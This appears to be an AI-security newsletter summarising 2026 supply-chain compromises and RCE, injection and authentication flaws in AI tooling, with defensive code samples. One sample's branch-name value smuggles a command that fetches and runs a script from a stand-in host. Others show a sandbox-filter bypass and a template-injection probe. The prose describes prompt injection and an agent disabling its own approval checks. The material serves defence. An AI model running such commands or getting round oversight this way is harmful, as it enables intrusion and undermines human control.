Claude Code leak: AI security intel briefing Mar–Apr 2026
Dear friends and colleagues,
This month brought what I believe is one of the most significant moments in AI security to date: Anthropic's Claude Code source code leaked, forcing the company into a rapid containment effort. While Anthropic has not disclosed how much code was exposed or who obtained it, the incident raises fundamental questions about how we protect the infrastructure underlying agentic AI systems. I think this matters not just because of what leaked, but because it demonstrates how quickly security boundaries dissolve when AI agents gain the ability to interact with real codebases and development environments.
When AI agents become attack vectors
The Claude Code leak sits at the intersection of two converging risks: supply chain vulnerabilities in AI tooling and the expanding attack surface created by agentic systems. This month alone, we saw a supply chain attack compromise axios, injecting a remote access trojan into versions 1.14.1 and 0.30.4 during a three-hour window that potentially affected thousands of installations of @lightdash/cli. Separately, Aquasecurity Trivy was found to contain embedded malicious code designed to steal credentials from CI/CD environments, and CISA added it to its Known Exploited Vulnerabilities catalog. The pattern is clear: tools that AI agents depend on are being actively weaponized.
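If you want a quick check for whether a repository pulled one of those axios builds, a few lines of scripting over the lockfile is enough. The sketch below assumes an npm v2/v3 package-lock.json layout and hard-codes only the version numbers reported above; adapt it to your own dependency inventory.

    import json

    # Versions of axios reported compromised in the incident described above.
    COMPROMISED = {"axios": {"1.14.1", "0.30.4"}}

    def flag_compromised(lockfile_path: str) -> list[str]:
        with open(lockfile_path) as fh:
            lock = json.load(fh)
        hits = []
        # npm v2/v3 lockfiles key entries by path, e.g. "node_modules/axios"
        # or "node_modules/@scope/pkg/node_modules/axios".
        for path, meta in lock.get("packages", {}).items():
            name = path.rsplit("node_modules/", 1)[-1]
            if meta.get("version") in COMPROMISED.get(name, set()):
                hits.append(f"{name}@{meta['version']} at {path}")
        return hits

    print(flag_compromised("package-lock.json"))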
The risk compounds when AI coding assistants interact with compromised dependencies. Cloud CLI, a UI for Claude Code and similar tools, had an OS command injection flaw before version 1.24.0 that allowed authenticated attackers to execute unauthorized commands through Git-related inputs. Similarly, claude-hovercraft exposed a remote code execution vulnerability in its executeClaudeCode method. Trivy's VSCode Extension version 1.8.12 was compromised with malware targeting local AI coding agents. When the tools designed to help AI agents write safer code are themselves unsafe, we have a recursion problem with no obvious base case.
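The underlying mistake in most of these flaws is the same: a user-influenced string reaches a shell. A minimal illustration of the pattern and its fix, not taken from any of the affected projects:

    import subprocess

    branch = "main; curl evil.example | sh"   # attacker-controlled "branch name"

    # Vulnerable shape (left commented out): interpolating the value into a
    # shell string means the semicolon starts a second command.
    # subprocess.run(f"git checkout {branch}", shell=True)

    # Safer shape: the argument-list form never invokes a shell, so shell
    # metacharacters are just bytes in a single (invalid) branch argument.
    subprocess.run(["git", "checkout", branch], check=False)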
Credential theft campaigns targeting AI infrastructure
Beyond supply chain attacks, we are seeing coordinated credential harvesting operations. Two LiteLLM versions, 1.82.7 and 1.82.8, were published containing malware designed specifically to steal user credentials. LiteLLM also had a critical JWT authentication bypass: tokens were cached using only their first 20 characters, so an attacker could craft a token whose prefix collides with a legitimate one and inherit its cached authorization. Meanwhile, a privilege escalation flaw in LiteLLM's /config/update endpoint let any authenticated user run malicious code or take over admin accounts. These are not isolated incidents; they represent systematic targeting of the authentication layer that protects AI deployments.
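To see why prefix-based cache keys are so fragile, consider this illustrative sketch (not LiteLLM's actual code): the two tokens below differ everywhere except the standard HS256 header, yet the truncated key treats them as the same credential.

    import hashlib

    def bad_cache_key(token: str) -> str:
        # Only the first 20 characters distinguish tokens, so different JWTs
        # that share a prefix map to the same cache entry.
        return token[:20]

    def good_cache_key(token: str) -> str:
        # Hash the full credential so a forged token with a matching prefix
        # cannot collide with a legitimate cached entry.
        return hashlib.sha256(token.encode()).hexdigest()

    legit = "eyJhbGciOiJIUzI1NiJ9.payload-A.sig-A"
    forged = "eyJhbGciOiJIUzI1NiJ9.payload-B.sig-B"   # same first 20 characters

    print(bad_cache_key(legit) == bad_cache_key(forged))    # True: collision
    print(good_cache_key(legit) == good_cache_key(forged))  # False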
Remote code execution remains the critical failure mode
The most severe vulnerabilities this month centered on remote code execution in AI workflow platforms. Langflow CVE-2026-33017 was exploited within 20 hours of disclosure, with CISA adding it to the KEV catalog and setting an April 8 remediation deadline for federal agencies. The flaw, rated 9.3 out of 10, allowed unauthenticated attackers to execute arbitrary Python code through an exposed API endpoint that accepted malicious workflow data without sandboxing. Three additional Langflow vulnerabilities followed similar patterns: a shell injection in GitHub Actions workflows where branch names could execute commands, an RCE via the Agentic Assistant feature that ran LLM-generated code on the server, and an arbitrary file write vulnerability in the v2 file upload API exploitable through directory traversal.
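The core failure is structural: workflow payloads carried executable code and the server ran it. Here is a hedged sketch of that shape and one way to harden it, using invented handler and component names rather than Langflow's real API; the real fix also requires authentication in front of the endpoint.

    # Minimal sketch of the failure mode, not Langflow's code: a handler that
    # trusts a "code" field from the request body.
    def handle_flow_update(payload: dict) -> None:
        exec(payload.get("code", ""))   # request-supplied Python runs in-process

    # A hardened handler accepts only references to pre-registered, reviewed
    # components and never exec()s strings from the payload.
    REGISTERED_COMPONENTS = {
        "csv_loader": lambda: print("running vetted CSV loader"),
        "retriever": lambda: print("running vetted retriever"),
    }

    def handle_flow_update_safe(payload: dict) -> None:
        component = payload.get("component")
        if component not in REGISTERED_COMPONENTS:
            raise ValueError(f"unknown component: {component!r}")
        REGISTERED_COMPONENTS[component]()

    handle_flow_update_safe({"component": "retriever"})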
MLflow presented a particularly dangerous cluster of flaws: the job execution endpoints under /ajax-api/3.0/jobs/* required no authentication at all when job execution was enabled, a command injection in the sagemaker module allowed malicious container image names to execute arbitrary commands, and a vulnerability in model serving code let attackers inject commands via python_env.yaml files when deploying models with local environment management. The n8n workflow platform had similar issues: CISA cataloged CVE-2025-68613 as actively exploited, while researchers disclosed a prototype pollution RCE in the GSuiteAdmin node and multiple RCE vectors in the Merge node's SQL mode.
PraisonAI demonstrated how layered security controls fail when each layer has bypass vulnerabilities: a sandbox escape via str subclass manipulation defeated all three security layers; a shell injection in run_python() allowed command execution through unescaped shell metacharacters; SSRF via unvalidated URLs in FileTools.download_file() enabled access to internal services; another SSRF in the passthrough() fallback accepted user-controlled api_base parameters; and a SubprocessSandbox escape worked even in STRICT mode by invoking sh -c to bypass command blocklists.
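The str subclass trick is worth understanding because it defeats any filter that inspects a string's stored value but later lets the object describe itself. This toy example shows the general technique, not PraisonAI's code:

    class SneakyStr(str):
        # The stored value looks benign, but __str__ returns something else.
        def __str__(self):
            return "print('filter bypassed: running attacker-chosen code')"

    payload = SneakyStr("print('hello world')")

    # A content blocklist inspects the benign stored value and passes.
    assert "import" not in payload and "subprocess" not in payload

    # A sandbox that later normalizes the object with str() executes the
    # attacker's replacement source instead.
    exec(str(payload))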
Exploited vulnerabilities demanding immediate action
CISA's KEV catalog additions this month reflect active exploitation campaigns. Beyond the Langflow and n8n flaws already mentioned, F5 BIG-IP CVE-2025-53521 enables remote code execution through an unspecified APM vulnerability, and Laravel Livewire CVE-2025-54068 allows unauthenticated code injection in certain configurations. Organizations running these platforms must assume compromise and follow vendor remediation guidance immediately.
Authentication bypasses and authorization failures
Broken authentication extended beyond credential theft. FastGPT's HTTP tools testing endpoint lacked authentication entirely, acting as an open SSRF proxy before version 4.14.9.5. A GitHub Actions workflow vulnerability in FastGPT used pull_request_target with code from untrusted forks, enabling secret theft and container registry compromise. WeKnora's tenant management system had no permission checks at all, allowing any authenticated user to delete arbitrary organizations. Directus's TUS upload endpoint bypassed row-level permissions, letting users overwrite files by UUID. Mesop exposed a /exec-py endpoint that executed arbitrary Python without authentication, while a path traversal in its FileStateSessionBackend allowed file manipulation through crafted state_token values.
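For the traversal cases, the durable fix is to resolve every requested path and verify it stays inside the intended directory before touching the filesystem. A small sketch of that guard, with an illustrative directory and function name:

    from pathlib import Path

    STATE_DIR = Path("/var/app/state").resolve()

    def state_file_for(token: str) -> Path:
        # Resolve the requested path and insist it remains under STATE_DIR,
        # so "../" sequences in a crafted token cannot reach other files.
        candidate = (STATE_DIR / token).resolve()
        if not candidate.is_relative_to(STATE_DIR):
            raise ValueError("path traversal attempt blocked")
        return candidate

    print(state_file_for("session-abc123"))      # stays under /var/app/state
    try:
        state_file_for("../../../etc/passwd")    # crafted token walking upward
    except ValueError as err:
        print(err)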
Injection vulnerabilities across AI platforms
SQL and command injection remained prevalent. SQLBot CVE-2026-32950 allowed code execution via unsanitized Excel sheet names before version 1.7.0, while CVE-2026-32622 chained missing upload permissions with prompt injection to achieve database server control. WeKnora's SQL injection protections failed to check PostgreSQL array and row expressions, allowing attackers to bypass the filters entirely and achieve remote code execution. BentoML's Dockerfile generation used unsandboxed Jinja2 templates that executed attacker code on the host before containerization, and its cloud deployment script directly interpolated user-supplied package names into shell commands. SillyTavern had path traversal flaws allowing arbitrary file read/write operations before version 1.17.0.
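The BentoML case is a reminder that template injection and shell interpolation are the same bug wearing different clothes. The sketch below uses an invented Dockerfile snippet and the classic 7*7 probe to show the difference between concatenating untrusted input into Jinja2 template source and passing it as render data; a real payload would reach far beyond arithmetic, and genuinely untrusted template sources belong in jinja2's SandboxedEnvironment or, better, nowhere near a template engine.

    from jinja2 import Environment

    env = Environment()
    user_pkg = "requests{{ 7 * 7 }}"   # attacker-controlled package name

    # Vulnerable pattern: the untrusted value becomes part of the template
    # source, so the expression inside it is evaluated.
    vulnerable = env.from_string("RUN pip install " + user_pkg)
    print(vulnerable.render())          # RUN pip install requests49

    # Safer pattern: the untrusted value is passed purely as data, so the
    # braces are emitted literally and never evaluated.
    safe = env.from_string("RUN pip install {{ pkg }}")
    print(safe.render(pkg=user_pkg))    # RUN pip install requests{{ 7 * 7 }}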
Agent control bypasses and consent mechanisms
OpenClaw demonstrated an agentic consent bypass where an LLM agent used config.patch to silently disable execution approval requirements, subverting human oversight entirely. This was fixed in version 2026.3.28, but it illustrates a broader problem: when agents have configuration access, security policies become mutable state that agents can modify. The mobile-mcp package failed to validate URL schemes before sending them to Android, allowing prompt injection to trigger phone calls and SMS messages. Version 0.0.50 now restricts schemes by default, requiring explicit opt-in for dangerous protocols.
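Scheme allowlisting is a simple control worth copying anywhere an agent can hand URLs to another system. The sketch below is hypothetical (the function and defaults are mine, not mobile-mcp's API) but mirrors the default-deny, explicit-opt-in shape of the fix:

    from urllib.parse import urlparse

    DEFAULT_SCHEMES = {"http", "https"}

    def scheme_allowed(url: str, opt_in=frozenset()) -> bool:
        # Default-deny: anything outside the allowlist is rejected unless the
        # operator has explicitly opted in to that scheme.
        scheme = urlparse(url).scheme.lower()
        return scheme in DEFAULT_SCHEMES | set(opt_in)

    print(scheme_allowed("https://example.com/help"))       # True
    print(scheme_allowed("tel:+15551234567"))               # False: not opted in
    print(scheme_allowed("sms:+15551234567", {"sms"}))      # True: explicit opt-in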
Infrastructure and dependency vulnerabilities
Beyond AI-specific tooling, critical vulnerabilities appeared in widely used libraries. NVIDIA APEX CVE-2025-33244 allowed deserialization of untrusted data in PyTorch versions before 2.6, enabling code execution and privilege escalation. OpenTelemetry's RMI instrumentation deserialized data without validation before version 2.26.1, requiring network-accessible RMI endpoints and gadget-chain libraries for exploitation. NLTK versions through 3.9.2 loaded external Java files in StanfordSegmenter without validation. The lodash library had code injection via _.template's imports parameter, fixed in version 4.18.0. ONNX's save_external_data method contained a TOCTOU vulnerability enabling arbitrary file overwrites through symlink attacks. The simple-git library's blockUnsafeOperationsPlugin failed to block protocol.allow config keys when written in uppercase, allowing ext:: protocol RCE. MCP Atlassian's confluence_download_attachment wrote files to unconstrained paths, enabling arbitrary code execution via malicious cron jobs. Mesop's WebSocket handler created unbounded threads per message, allowing denial of service through resource exhaustion.
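For the deserialization class in particular, the practical mitigation is to stop unpickling untrusted checkpoints. A short sketch with a placeholder path; weights_only became the torch.load default in PyTorch 2.6, so older deployments need to pass it explicitly.

    import torch

    # weights_only=True restricts unpickling to tensors and a small set of
    # primitive types, so a booby-trapped checkpoint cannot execute code at
    # load time. "model.ckpt" is a placeholder path.
    state = torch.load("model.ckpt", map_location="cpu", weights_only=True)
    print(sorted(state.keys()))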
The Claude Code leak reminds us that securing AI systems requires more than patching individual vulnerabilities. We need architectural changes that assume agents will encounter compromised dependencies, that authentication layers will be targeted systematically, and that sandbox escapes are inevitable. The current approach treats each vulnerability as a discrete failure when we should be designing for continuous compromise. I recommend treating any AI agent deployment as a zero-trust environment: assume breach, segment aggressively, and monitor for lateral movement as the primary control.
As always, you can find the latest AI security intelligence at AI Sec Watch.
— Jack
Subscribe to receive future newsletters here.